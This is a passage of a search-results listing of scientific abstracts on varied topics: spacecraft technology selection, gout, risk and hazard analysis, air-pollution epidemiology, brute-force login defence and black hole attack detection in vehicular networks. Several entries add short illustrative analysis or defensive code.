    Emerging technologies are changing the way space missions are developed and implemented. Technology development programs are proceeding with the goal of enhancing spacecraft performance and reducing mass and cost. However, it is often the case that technology insertion assessment activities, in the interest of maximizing performance and/or mass reduction, do not consider synergistic system-level effects. Furthermore, even though technical risks are often identified as a large cost and schedule driver, many design processes ignore effects of cost and schedule uncertainty. This research is based on the hypothesis that technology selection is a problem of balancing interrelated (and potentially competing) objectives. Current spacecraft technology selection approaches are summarized, and a Methodology for Evaluating and Ranking Insertion of Technology (MERIT) that expands on these practices to attack otherwise unsolved problems is demonstrated. MERIT combines the modern techniques of technology maturity measures, parametric models, genetic algorithms, and risk assessment (cost and schedule) in a unique manner to resolve very difficult issues including: user-generated uncertainty, relationships between cost/schedule and complexity, and technology "portfolio" management. While the methodology is sufficiently generic that it may in theory be applied to a number of technology insertion problems, this research focuses on application to the specific case of small (<500 kg) satellite design. Small satellite missions are of particular interest because they are often developed under rigid programmatic (cost and schedule) constraints and are motivated to introduce advanced technologies into the design. MERIT is demonstrated for programs procured under varying conditions and constraints such as stringent performance goals, not-to-exceed costs, or hard schedule requirements. MERIT'S contributions to the engineering community are its: unique coupling of the aspects of performance

  4. The Obesity Paradox in Recurrent Attacks of Gout in Observational Studies: Clarification and Remedy

    Science.gov (United States)

    Nguyen, Uyen-Sa D. T.; Zhang, Yuqing; Louie-Gao, Qiong; Niu, Jingbo; Felson, David T.; LaValley, Michael P.; Choi, Hyon K.

    2016-01-01

    Objective: Obesity is strongly associated with incident gout risk; its association with the risk of recurrent gout attacks has been null or weak, constituting an obesity paradox. We sought to demonstrate and overcome the methodologic issues associated with the obesity paradox for the risk of recurrent gout attacks. Methods: Using the MRFIT database, we decomposed the total effect of obesity into its direct and indirect (i.e., mediated) effects using marginal structural models. We also estimated the total effect of BMI change from baseline among incident gout patients. Results: Of 11,816 gout-free subjects at baseline, we documented 408 incident gout cases, with 132 developing recurrent gout attacks over a 7-year follow-up. The adjusted odds ratio (OR) for incident gout among obese individuals was 2.6, while that for recurrent gout attacks among gout patients was 0.98 (i.e., the obesity paradox). These ORs correlated well with the ORs for the indirect and direct effects of obesity on the risk of recurrent gout attacks (i.e., 2.83 and 0.98, respectively). Compared with no BMI change, the OR of losing vs. gaining >5% of baseline BMI was 0.61 and 1.60 for recurrent gout attacks, respectively, with a significant trend. The obesity paradox for the risk of recurrent gout attacks is explained by the absence of the direct effect, which is often measured in conventional analyses and misinterpreted as the intended total effect of interest. In contrast, the BMI change analysis correctly estimated the intended total effect of BMI and revealed a dose-response relationship. PMID:27331767

  5. Attacker Model Lab

    OpenAIRE

    2006-01-01

    Tutorial, quiz, and presentation (interactive media element). This interactive tutorial covers the two sub-classes of computer attackers: amateurs and professionals. It provides valuable insight into the nature of necessary protection measures for information assets. CS3600 Information Assurance: Introduction to Computer Security Course

  6. Transient Ischemic Attack

    Medline Plus

    Full Text Available ... major stroke. It's important to call 9-1-1 immediately for any stroke symptoms.

  7. Tracking and Analyzing Individual Distress Following Terrorist Attacks Using Social Media Streams.

    Science.gov (United States)

    Lin, Yu-Ru; Margolin, Drew; Wen, Xidao

    2017-08-01

    Risk research has theorized a number of mechanisms that might trigger, prolong, or potentially alleviate individuals' distress following terrorist attacks. These mechanisms are difficult to examine in a single study, however, because the social conditions of terrorist attacks are difficult to simulate in laboratory experiments and appropriate preattack baselines are difficult to establish with surveys. To address this challenge, we propose the use of computational focus groups and a novel analysis framework to analyze a social media stream that archives user history and location. The approach uses time-stamped behavior to quantify an individual's preattack behavior after an attack has occurred, enabling the assessment of time-specific changes in the intensity and duration of an individual's distress, as well as the assessment of individual and social-level covariates. To exemplify the methodology, we collected over 18 million tweets from 15,509 users located in Paris on November 13, 2015, and measured the degree to which they expressed anxiety, anger, and sadness after the attacks. The analysis resulted in findings that would be difficult to observe through other methods, such as that news media exposure had competing, time-dependent effects on anxiety, and that gender dynamics are complicated by baseline behavior. Opportunities for integrating computational focus group analysis with traditional methods are discussed. © 2017 Society for Risk Analysis.
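    The core measurement described (change in each user's expressed distress relative to that user's own pre-attack baseline) can be sketched with a simple word-count approach. The lexicon, file name, column names, and cut-off below are placeholders; the study used its own measures of anxiety, anger, and sadness.

    ```python
    import pandas as pd

    ANXIETY_WORDS = {"worried", "afraid", "scared", "anxious", "panic"}  # placeholder lexicon

    def anxiety_score(text):
        tokens = text.lower().split()
        return sum(t.strip(".,!?") in ANXIETY_WORDS for t in tokens) / max(len(tokens), 1)

    tweets = pd.read_csv("paris_tweets.csv", parse_dates=["timestamp"])  # hypothetical file
    cutoff = pd.Timestamp("2015-11-13")  # date from the abstract; a finer cut-off would be used in practice

    tweets["score"] = tweets["text"].apply(anxiety_score)
    tweets["period"] = (tweets["timestamp"] >= cutoff).map({False: "pre", True: "post"})

    per_user = tweets.groupby(["user_id", "period"])["score"].mean().unstack()
    per_user["change"] = per_user["post"] - per_user["pre"]   # per-user distress change
    print(per_user["change"].describe())
    ```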

  8. Network meta-analysis-highly attractive but more methodological research is needed

    Directory of Open Access Journals (Sweden)

    Singh Sonal

    2011-06-01

    Full Text Available Network meta-analysis, in the context of a systematic review, is a meta-analysis in which multiple treatments (that is, three or more) are being compared using both direct comparisons of interventions within randomized controlled trials and indirect comparisons across trials based on a common comparator. To ensure the validity of findings from network meta-analyses, the systematic review must be designed rigorously and conducted carefully. Aspects of designing and conducting a systematic review for network meta-analysis include defining the review question, specifying eligibility criteria, searching for and selecting studies, assessing risk of bias and quality of evidence, conducting a network meta-analysis, and interpreting and reporting findings. This commentary summarizes the methodologic challenges and research opportunities for network meta-analysis relevant to each aspect of the systematic review process, based on discussions at a network meta-analysis methodology meeting we hosted in May 2010 at the Johns Hopkins Bloomberg School of Public Health. Since this commentary reflects the discussion at that meeting, it is not intended to provide an overview of the field.
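    The indirect comparison across a common comparator is usually carried out on the log odds ratio scale (the Bucher adjusted indirect comparison). The sketch below assumes that framing; the effect estimates and standard errors are illustrative numbers, not data from any trial.

    ```python
    import numpy as np
    from scipy import stats

    # Direct estimates against a common comparator C (log odds ratios and standard errors).
    log_or_ac, se_ac = np.log(0.75), 0.10   # treatment A vs C (illustrative)
    log_or_bc, se_bc = np.log(0.90), 0.12   # treatment B vs C (illustrative)

    # Bucher adjusted indirect comparison of A vs B.
    log_or_ab = log_or_ac - log_or_bc
    se_ab = np.sqrt(se_ac ** 2 + se_bc ** 2)
    ci = np.exp(log_or_ab + np.array([-1.96, 1.96]) * se_ab)
    p_value = 2 * (1 - stats.norm.cdf(abs(log_or_ab) / se_ab))

    print(f"Indirect OR(A vs B) = {np.exp(log_or_ab):.2f}, 95% CI {ci.round(2)}, p = {p_value:.3f}")
    ```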

  9. Development of a systematic methodology to select hazard analysis techniques for nuclear facilities

    Energy Technology Data Exchange (ETDEWEB)

    Vasconcelos, Vanderley de; Reis, Sergio Carneiro dos; Costa, Antonio Carlos Lopes da [Centro de Desenvolvimento da Tecnologia Nuclear (CDTN/CNEN-MG), Belo Horizonte, MG (Brazil)]. E-mails: vasconv@cdtn.br; reissc@cdtn.br; aclc@cdtn.br; Jordao, Elizabete [Universidade Estadual de Campinas (UNICAMP), SP (Brazil). Faculdade de Engenharia Quimica]. E-mail: bete@feq.unicamp.br

    2008-07-01

    In order to comply with licensing requirements of regulatory bodies risk assessments of nuclear facilities should be carried out. In Brazil, such assessments are part of the Safety Analysis Reports, required by CNEN (Brazilian Nuclear Energy Commission), and of the Risk Analysis Studies, required by the competent environmental bodies. A risk assessment generally includes the identification of the hazards and accident sequences that can occur, as well as the estimation of the frequencies and effects of these unwanted events on the plant, people, and environment. The hazard identification and analysis are also particularly important when implementing an Integrated Safety, Health, and Environment Management System following ISO 14001, BS 8800 and OHSAS 18001 standards. Among the myriad of tools that help the process of hazard analysis can be highlighted: CCA (Cause- Consequence Analysis); CL (Checklist Analysis); ETA (Event Tree Analysis); FMEA (Failure Mode and Effects Analysis); FMECA (Failure Mode, Effects and Criticality Analysis); FTA (Fault Tree Analysis); HAZOP (Hazard and Operability Study); HRA (Human Reliability Analysis); Pareto Analysis; PHA (Preliminary Hazard Analysis); RR (Relative Ranking); SR (Safety Review); WI (What-If); and WI/CL (What-If/Checklist Analysis). The choice of a particular technique or a combination of techniques depends on many factors like motivation of the analysis, available data, complexity of the process being analyzed, expertise available on hazard analysis, and initial perception of the involved risks. This paper presents a systematic methodology to select the most suitable set of tools to conduct the hazard analysis, taking into account the mentioned involved factors. Considering that non-reactor nuclear facilities are, to a large extent, chemical processing plants, the developed approach can also be applied to analysis of chemical and petrochemical plants. The selected hazard analysis techniques can support cost

  10. Development of a systematic methodology to select hazard analysis techniques for nuclear facilities

    International Nuclear Information System (INIS)

    Vasconcelos, Vanderley de; Reis, Sergio Carneiro dos; Costa, Antonio Carlos Lopes da; Jordao, Elizabete

    2008-01-01

    In order to comply with licensing requirements of regulatory bodies risk assessments of nuclear facilities should be carried out. In Brazil, such assessments are part of the Safety Analysis Reports, required by CNEN (Brazilian Nuclear Energy Commission), and of the Risk Analysis Studies, required by the competent environmental bodies. A risk assessment generally includes the identification of the hazards and accident sequences that can occur, as well as the estimation of the frequencies and effects of these unwanted events on the plant, people, and environment. The hazard identification and analysis are also particularly important when implementing an Integrated Safety, Health, and Environment Management System following ISO 14001, BS 8800 and OHSAS 18001 standards. Among the myriad of tools that help the process of hazard analysis can be highlighted: CCA (Cause- Consequence Analysis); CL (Checklist Analysis); ETA (Event Tree Analysis); FMEA (Failure Mode and Effects Analysis); FMECA (Failure Mode, Effects and Criticality Analysis); FTA (Fault Tree Analysis); HAZOP (Hazard and Operability Study); HRA (Human Reliability Analysis); Pareto Analysis; PHA (Preliminary Hazard Analysis); RR (Relative Ranking); SR (Safety Review); WI (What-If); and WI/CL (What-If/Checklist Analysis). The choice of a particular technique or a combination of techniques depends on many factors like motivation of the analysis, available data, complexity of the process being analyzed, expertise available on hazard analysis, and initial perception of the involved risks. This paper presents a systematic methodology to select the most suitable set of tools to conduct the hazard analysis, taking into account the mentioned involved factors. Considering that non-reactor nuclear facilities are, to a large extent, chemical processing plants, the developed approach can also be applied to analysis of chemical and petrochemical plants. The selected hazard analysis techniques can support cost
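    Selecting techniques "taking into account the mentioned involved factors" can be sketched as a weighted scoring matrix over the factors listed in the two records above (available data, process complexity, expertise, motivation). The weights and scores below are hypothetical illustrations, not the criteria values of the developed methodology.

    ```python
    # Weighted-scoring sketch for choosing hazard analysis techniques.
    factors = {"available_data": 0.3, "process_complexity": 0.3,
               "analyst_expertise": 0.2, "analysis_motivation": 0.2}   # weights sum to 1

    # Suitability scores (1-5) of each technique against each factor; values are illustrative.
    scores = {
        "HAZOP": {"available_data": 4, "process_complexity": 5,
                  "analyst_expertise": 3, "analysis_motivation": 4},
        "FMEA": {"available_data": 3, "process_complexity": 3,
                 "analyst_expertise": 4, "analysis_motivation": 4},
        "What-If/Checklist": {"available_data": 5, "process_complexity": 2,
                              "analyst_expertise": 5, "analysis_motivation": 3},
    }

    ranking = sorted(
        ((sum(w * scores[t][f] for f, w in factors.items()), t) for t in scores),
        reverse=True,
    )
    for total, technique in ranking:
        print(f"{technique}: {total:.2f}")
    ```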

  11. 3-Dimensional Methodology for the Control Rod Ejection Accident Analysis Using UNICORNTM

    Energy Technology Data Exchange (ETDEWEB)

    Jang, Chan-su; Um, Kil-sup; Ahn, Dawk-hwan [Korea Nuclear Fuel Company, Taejon (Korea, Republic of); Kim, Yo-han; Sung, Chang-kyung [KEPRI, Taejon (Korea, Republic of); Song, Jae-seung [Korea Atomic Energy Research Institute, Taejon (Korea, Republic of)

    2006-07-01

    The control rod ejection accident has been analyzed with STRIKIN-II code using the point kinetics model coupled with conservative factors to address the three dimensional aspects. This may result in a severe transient with very high fuel enthalpy deposition. KNFC, under the support of KEPRI and KAERI, is developing 3-dimensional methodology for the rod ejection accident analysis using UNICORNTM (Unified Code of RETRAN, TORC and MASTER). For this purpose, 3-dimensional MASTER-TORC codes, which have been combined with the dynamic-link library by KAERI, are used in the transient analysis of the core and RETRAN code is used to estimate the enthalpy deposition in the hot rod.

  12. Methodology for repeated load analysis of composite structures with embedded magnetic microwires

    Directory of Open Access Journals (Sweden)

    K. Semrád

    2017-01-01

    Full Text Available The article addresses the strength of cyclically loaded composite structures with the possibility of contactless stress measurement inside the material. For this purpose, a contactless tensile stress sensor based on an improved induction principle, using magnetic microwires embedded in the composite structure, has been developed. A methodology based on the E-N approach was applied to the analysis of the repeated load of the wing hinge connection, including finite element method (FEM) fatigue strength analysis. The results proved that composites, in comparison with metal structures, offer a significant weight reduction for small aircraft construction, while the required strength, stability and lifetime of the components are retained.
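
    The E-N (strain-life) approach mentioned above estimates the number of load cycles a component survives from the local strain amplitude, typically via the Coffin-Manson/Basquin relation. The sketch below inverts that relation numerically; the material constants are generic illustrative values, not data from the analyzed wing hinge connection.

      # Minimal strain-life (E-N) sketch: solve
      #   eps_a = (sigma_f'/E) * (2N)^b + eps_f' * (2N)^c
      # for the number of cycles to failure N at a given strain amplitude.
      from scipy.optimize import brentq

      E = 72_000.0     # elastic modulus [MPa] (illustrative, aluminium-like)
      SIGMA_F = 900.0  # fatigue strength coefficient sigma_f' [MPa] (illustrative)
      B = -0.10        # fatigue strength exponent (illustrative)
      EPS_F = 0.35     # fatigue ductility coefficient eps_f' (illustrative)
      C = -0.65        # fatigue ductility exponent (illustrative)

      def strain_amplitude(two_n):
          """Total strain amplitude predicted for 2N reversals."""
          return (SIGMA_F / E) * two_n ** B + EPS_F * two_n ** C

      def cycles_to_failure(eps_a):
          """Invert the E-N curve numerically for a given strain amplitude."""
          two_n = brentq(lambda x: strain_amplitude(x) - eps_a, 1.0, 1e12)
          return two_n / 2.0

      for eps_a in (0.010, 0.005, 0.002):
          print(f"eps_a = {eps_a:.3f} -> N_f ~ {cycles_to_failure(eps_a):.3e} cycles")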

  13. 3-Dimensional Methodology for the Control Rod Ejection Accident Analysis Using UNICORN™

    International Nuclear Information System (INIS)

    Jang, Chan-su; Um, Kil-sup; Ahn, Dawk-hwan; Kim, Yo-han; Sung, Chang-kyung; Song, Jae-seung

    2006-01-01

    The control rod ejection accident has been analyzed with the STRIKIN-II code, using a point kinetics model coupled with conservative factors to address the three-dimensional aspects. This may result in a severe transient with very high fuel enthalpy deposition. KNFC, with the support of KEPRI and KAERI, is developing a 3-dimensional methodology for rod ejection accident analysis using UNICORN™ (Unified Code of RETRAN, TORC and MASTER). For this purpose, the 3-dimensional MASTER-TORC codes, which have been coupled through a dynamic-link library by KAERI, are used for the transient analysis of the core, and the RETRAN code is used to estimate the enthalpy deposition in the hot rod.

  14. Statistical trend analysis methodology for rare failures in changing technical systems

    International Nuclear Information System (INIS)

    Ott, K.O.; Hoffmann, H.J.

    1983-07-01

    A methodology for statistical trend analysis (STA) of failure rates is presented. It applies primarily to relatively rare events in changing technologies or components. The formulation is more general and the assumptions are less restrictive than in a previously published version. Relations between the statistical trend analysis and probabilistic risk assessment (PRA) are discussed in terms of the categorization of decisions for action following particular failure events. The significance of tentatively identified trends is explored. In addition to statistical tests for trend significance, a combination of STA and PRA results quantifying the trend complement is proposed. The STA approach is compared with other concepts for trend characterization. (orig.)
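
    One standard significance test for a trend in the rate of rare failure events is the Laplace trend test on the observed failure times. The sketch below is offered only as an illustration of this class of test and is not necessarily the formulation used in the paper; the failure times in the example are invented.

      import math
      from statistics import NormalDist

      def laplace_trend_statistic(event_times, observation_end):
          """U > 0 suggests an increasing failure rate, U < 0 a decreasing one."""
          n = len(event_times)
          mean_time = sum(event_times) / n
          u = (mean_time - observation_end / 2.0) / (
              observation_end * math.sqrt(1.0 / (12.0 * n)))
          p_value = 2.0 * (1.0 - NormalDist().cdf(abs(u)))  # two-sided, normal approx.
          return u, p_value

      # Illustrative failure times [operating years] over a 10-year observation window.
      failures = [1.2, 3.5, 5.1, 7.8, 8.4, 9.0, 9.6]
      u, p = laplace_trend_statistic(failures, observation_end=10.0)
      print(f"Laplace U = {u:.2f}, two-sided p ~ {p:.3f}")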

  15. A rigorous methodology for development and uncertainty analysis of group contribution based property models

    DEFF Research Database (Denmark)

    Frutiger, Jerome; Abildskov, Jens; Sin, Gürkan

    ) weighted-least-square regression. 3) Initialization of the estimation by use of linear algebra, providing a first guess. 4) Sequential and simultaneous GC parameter estimation using 4 different minimization algorithms. 5) Thorough uncertainty analysis: a) based on an asymptotic approximation of the parameter...... covariance matrix, b) based on the bootstrap method, providing 95%-confidence intervals of the parameters and the predicted property. 6) Performance statistics analysis and model application. The application of the methodology is shown for a new GC model built to predict the lower flammability limit (LFL) of refrigerants...... their credibility and robustness in wider industrial and scientific applications.
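
    Step 5b of the methodology, bootstrap-based 95%-confidence intervals of the parameters, can be illustrated with a small sketch. The linear model and the synthetic data below are stand-ins for an actual group-contribution property model; the fit and bootstrap_ci functions are illustrative, not the authors' implementation.

      import numpy as np

      rng = np.random.default_rng(0)

      # Synthetic "experimental" data: property = X @ theta_true + noise.
      X = rng.uniform(0.0, 5.0, size=(60, 3))    # e.g. group occurrence counts
      theta_true = np.array([2.0, -1.0, 0.5])
      y = X @ theta_true + rng.normal(scale=0.3, size=60)

      def fit(X, y):
          """Ordinary least-squares estimate of the parameters."""
          return np.linalg.lstsq(X, y, rcond=None)[0]

      def bootstrap_ci(X, y, n_boot=2000, alpha=0.05):
          """Resample (X, y) pairs with replacement and refit each replicate."""
          estimates = np.empty((n_boot, X.shape[1]))
          for b in range(n_boot):
              idx = rng.integers(0, len(y), size=len(y))
              estimates[b] = fit(X[idx], y[idx])
          lo = np.percentile(estimates, 100 * alpha / 2, axis=0)
          hi = np.percentile(estimates, 100 * (1 - alpha / 2), axis=0)
          return lo, hi

      theta_hat = fit(X, y)
      lo, hi = bootstrap_ci(X, y)
      for j, (t, l, h) in enumerate(zip(theta_hat, lo, hi)):
          print(f"theta[{j}] = {t:+.3f}  95% CI [{l:+.3f}, {h:+.3f}]")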

  16. Case-Crossover Analysis of Air Pollution Health Effects: A Systematic Review of Methodology and Application

    Science.gov (United States)

    Carracedo-Martínez, Eduardo; Taracido, Margarita; Tobias, Aurelio; Saez, Marc; Figueiras, Adolfo

    2010-01-01

    Background: Case-crossover is one of the most used designs for analyzing the health-related effects of air pollution. Nevertheless, no one has reviewed its application and methodology in this context. Objective: We conducted a systematic review of case-crossover (CCO) designs used to study the relationship between air pollution and morbidity and mortality, from the standpoint of methodology and application. Data sources and extraction: A search was made of the MEDLINE and EMBASE databases. Reports were classified as methodologic or applied. From the latter, the following information was extracted: author, study location, year, type of population (general or patients), dependent variable(s), independent variable(s), type of CCO design, and whether effect modification was analyzed for variables at the individual level. Data synthesis: The review covered 105 reports that fulfilled the inclusion criteria. Of these, 24 addressed methodological aspects, and the remainder involved the design’s application. In the methodological reports, the designs that yielded the best results in simulation were symmetric bidirectional CCO and time-stratified CCO. Furthermore, we observed an increase across time in the use of certain CCO designs, mainly symmetric bidirectional and time-stratified CCO. The dependent variables most frequently analyzed were those relating to hospital morbidity; the pollutants most often studied were those linked to particulate matter. Among the CCO-application reports, 13.6% studied effect modification for variables at the individual level. Conclusions: The use of CCO designs has undergone considerable growth; the most widely used designs were those that yielded better results in simulation studies: symmetric bidirectional and time-stratified CCO. However, the advantages of CCO as a method of analysis of variables at the individual level are put to little use. PMID:20356818
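
    In the time-stratified design highlighted above, each case day is compared with referent days that share its year, month, and day of the week, which controls for long-term trend, seasonality, and day-of-week effects by design. The sketch below selects those referent days; the example date is invented for illustration.

      from datetime import date, timedelta

      def time_stratified_referents(case_day: date):
          """All days in the same year/month with the same weekday, excluding the case day."""
          referents = []
          d = case_day.replace(day=1)
          while d.month == case_day.month:
              if d.weekday() == case_day.weekday() and d != case_day:
                  referents.append(d)
              d += timedelta(days=1)
          return referents

      case = date(2009, 7, 15)  # e.g. the day of a hospital admission
      print(case.strftime("%A"),
            [r.isoformat() for r in time_stratified_referents(case)])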

  17. Risk of stroke and cardiovascular events after ischemic stroke or transient ischemic attack in patients with type 2 diabetes or metabolic syndrome: secondary analysis of the Stroke Prevention by Aggressive Reduction in Cholesterol Levels (SPARCL) trial

    DEFF Research Database (Denmark)

    Callahan, Alfred; Amarenco, Pierre; Goldstein, Larry B

    2011-01-01

    To perform a secondary analysis of the Stroke Prevention by Aggressive Reduction in Cholesterol Levels (SPARCL) trial, which tested the effect of treatment with atorvastatin in reducing stroke in subjects with a recent stroke or transient ischemic attack, to explore the effects of treatment...

  18. Blocking of Brute Force Attack

    OpenAIRE

    M.Venkata Krishna Reddy

    2012-01-01

    A common threat Web developers face is a password-guessing attack known as a brute-force attack. A brute-force attack is an attempt to discover a password by systematically trying every possible combination of letters, numbers, and symbols until you discover the one correct combination that works. If your Web site requires user authentication, you are a good target for a brute-force attack. An attacker can always discover a password through a brute-force attack, but the downside is that it co...
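
    A common countermeasure implied by this line of work is to throttle or temporarily lock an account after repeated failed logins, so that exhaustively trying combinations becomes impractically slow. The sketch below is a minimal in-memory illustration; the thresholds, the lockout schedule, and the check_credentials stub are assumptions, and a real deployment would also track client IPs, persist state, and combine throttling with measures such as CAPTCHAs or multi-factor authentication.

      import time
      from collections import defaultdict

      MAX_FAILURES = 5      # failures allowed before locking (illustrative)
      BASE_LOCKOUT = 30.0   # seconds; doubles with every further failure (illustrative)

      _failures = defaultdict(int)       # username -> consecutive failed attempts
      _locked_until = defaultdict(float) # username -> monotonic time the lock expires

      def check_credentials(username, password):
          """Stand-in for the real password check (e.g. verifying a stored hash)."""
          return username == "alice" and password == "correct horse"

      def attempt_login(username, password, now=None):
          now = time.monotonic() if now is None else now
          if now < _locked_until[username]:
              return "locked"                 # reject without evaluating the password
          if check_credentials(username, password):
              _failures[username] = 0         # success resets the counter
              return "ok"
          _failures[username] += 1
          if _failures[username] >= MAX_FAILURES:
              extra = _failures[username] - MAX_FAILURES
              _locked_until[username] = now + BASE_LOCKOUT * (2 ** extra)
          return "denied"

      for i in range(7):
          print(i, attempt_login("alice", "guess%d" % i))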

  19. Performance analysis and implementation of proposed mechanism for detection and prevention of security attacks in routing protocols of vehicular ad-hoc network (VANET)

    Directory of Open Access Journals (Sweden)

    Parul Tyagi

    2017-07-01

    Full Text Available Next-generation communication networks have become widely popular as ad-hoc networks, broadly categorized into mobile-node-based mobile ad-hoc networks (MANET) and vehicular-node-based vehicular ad-hoc networks (VANET). VANET aims to maintain the safety of vehicle drivers by enabling autonomous communication with nearby vehicles. Each vehicle in the ad-hoc network acts as an intelligent mobile node characterized by high mobility and the formation of dynamic networks. Ad-hoc networks are decentralized dynamic networks with demanding requirements for efficient and secure communication, because the vehicles are persistently in motion. These networks are susceptible to various attacks such as Wormhole attacks, denial-of-service attacks and Black Hole Attacks. The paper examines the security features of the routing protocols in VANET and the applicability of the AODV (Ad hoc On-Demand Distance Vector) protocol to detecting and tackling a particular category of network attack known as the Black Hole Attack. A new algorithm is proposed to enhance the security mechanism of the AODV protocol by introducing a mechanism to detect Black Hole Attacks and to protect the network from them, in which the source node stores all route replies in a lookup table. This table stores the sequence numbers of all route replies, arranged in ascending order using PUSH and POP operations. A priority is calculated based on the sequence number, and the RREP having a presumably very high destination sequence number is discarded. The results show that the proposed algorithm for the detection and prevention of Black Hole Attacks increases security in Intelligent Transportation Systems (ITS) and reduces the effect of malicious nodes in the VANET. The NCTUns simulator is used in this research work.
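
    The core of the proposed detection mechanism, ordering the collected route replies by destination sequence number and discarding the RREP whose sequence number is implausibly high, can be sketched as follows. The RouteReply fields, the median-based reference, and the SUSPICION_FACTOR threshold are illustrative assumptions rather than the paper's exact algorithm.

      from dataclasses import dataclass

      @dataclass
      class RouteReply:
          sender: str
          dest_seq_num: int
          hop_count: int

      # Hypothetical heuristic: a reply whose destination sequence number exceeds
      # the median of the collected replies by more than this factor is suspicious.
      SUSPICION_FACTOR = 4

      def filter_black_hole_rreps(replies):
          """Return (accepted, suspicious) route replies for one route discovery."""
          if len(replies) < 2:
              return list(replies), []
          ordered = sorted(replies, key=lambda r: r.dest_seq_num)   # ascending order
          reference = ordered[len(ordered) // 2].dest_seq_num        # median reply
          accepted, suspicious = [], []
          for r in ordered:
              if reference > 0 and r.dest_seq_num > SUSPICION_FACTOR * reference:
                  suspicious.append(r)   # presumably forged by a black hole node
              else:
                  accepted.append(r)
          return accepted, suspicious

      rreps = [RouteReply("node_B", 42, 3),
               RouteReply("node_C", 45, 4),
               RouteReply("node_X", 9_000_000, 1)]   # absurdly "fresh" route
      ok, bad = filter_black_hole_rreps(rreps)
      print("accepted:", [r.sender for r in ok], "suspicious:", [r.sender for r in bad])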

  20. Ruling the Commons. Introducing a new methodology for the analysis of historical commons

    Directory of Open Access Journals (Sweden)

    Tine de Moor

    2016-10-01

    Full Text Available Despite significant progress in recent years, the evolution of commons over the long run remains an under-explored area within commons studies. In recent years, an international team of historians has worked under the umbrella of the Common Rules Project in order to design and test a new methodology aimed at advancing our knowledge of the dynamics of institutions for collective action – in particular commons. This project aims to contribute to the current debate on commons on three different fronts. Theoretically, it explicitly draws our attention to issues of change and adaptation in the commons – contrasting with more static analyses. Empirically, it highlights the value of historical records as a rich source of information for longitudinal analysis of the functioning of commons. Methodologically, it develops a systematic way of analyzing and comparing commons’ regulations across regions and time, setting a number of variables that have been defined on the basis of the “most common denominators” in commons regulation across countries and time periods. In this paper we introduce the project, describe our sources and methodology, and present the preliminary results of our analysis.